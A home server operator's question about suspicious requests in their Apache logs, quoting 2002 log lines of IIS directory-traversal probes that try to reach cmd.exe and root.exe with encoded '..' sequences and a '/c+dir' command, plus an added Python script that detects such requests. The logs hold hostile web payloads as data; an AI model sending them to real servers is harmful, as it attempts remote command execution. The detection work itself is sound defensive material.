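I have been running a public home server since my FLET'S ADSL line was activated. Recently I took a look at the Apache log files and found that suspicious accesses are being made frequently. Below is the most recent part of the log files. Log entries like these are recorded about once an hour.
From the contents, it looks like something is trying to access Windows exe files; is it targeting an IIS bug? Is this what you would call an attack?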
【/usr/local/apache/logs/error_log】
[Sun Jun 2 09:28:32 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/root.exe
[Sun Jun 2 09:28:32 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/MSADC/root.exe
[Sun Jun 2 09:28:32 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/c/winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/d/winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/msadc/..%5c../..%5c../..%5c/..??../..??../..??../winnt/system32/cmd.exe
[Sun Jun 2 09:28:34 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..??../winnt/system32/cmd.exe
[Sun Jun 2 09:28:34 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..政../winnt/system32/cmd.exe
[Sun Jun 2 09:28:34 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..??../winnt/system32/cmd.exe
[Sun Jun 2 09:28:35 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:35 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..%2f../winnt/system32/cmd.exe
【/usr/local/apache/logs/access_log】
61.74.69.145 - - [02/Jun/2002:09:28:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
61.74.69.145 - - [02/Jun/2002:09:28:32 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
61.74.69.145 - - [02/Jun/2002:09:28:35 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
61.74.69.145 - - [02/Jun/2002:09:28:35 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
61.74.69.145 - - [02/Jun/2002:09:28:35 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
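The request patterns in the access_log above can be picked out automatically. The following is an added example, not part of the original post: a small Python classifier that decodes each request path repeatedly and reports what it finds. The function names and finding labels are assumptions chosen for this example, and the four sample lines are copied from the log in the post.

```python
import re
from urllib.parse import unquote_to_bytes
# Sample input: four request lines copied from the access_log in the post.
SAMPLE = '''\
61.74.69.145 - - [02/Jun/2002:09:28:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})\b')
OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)  # 0xC0/0xC1 never occur in valid UTF-8

def classify(target):
    """Return the set of findings for one request target (path?query)."""
    path = target.partition("?")[0]
    findings = set()
    if re.search(r"%(?![0-9A-Fa-f]{2})", path):   # '%' not followed by two hex digits
        findings.add("malformed-escape")
    data, passes = path.encode(), 0
    while passes < 5:                             # percent-decode until stable, bounded
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, passes = nxt, passes + 1
    if passes > 1:                                # e.g. %255c -> %5c -> backslash
        findings.add("multi-encoded")
    if OVERLONG.search(data):
        findings.add("overlong-utf8")
        # Fold to the byte a decoder that accepts overlong forms would produce.
        data = OVERLONG.sub(lambda m: bytes([((m[0][0] & 1) << 6) | (m[1][0] & 0x3F)]), data)
    segments = data.replace(b"\\", b"/").lower().split(b"/")
    if b".." in segments:
        findings.add("traversal")
    if segments[-1] in (b"cmd.exe", b"root.exe"):
        findings.add("windows-exe-probe")
    return findings

def scan(log_text):
    """Map client IP -> list of (status, target, findings) for flagged requests."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and (found := classify(m[2])):
            hits.setdefault(m[1], []).append((int(m[3]), m[2], found))
    return hits

if __name__ == "__main__":
    for ip, rows in scan(SAMPLE).items():
        print(ip, *[(s, sorted(f)) for s, _, f in rows], sep="\n  ")
```

The status column is carried through so that the 404 and 400 responses seen in this log can be told apart from any flagged request that returned 200.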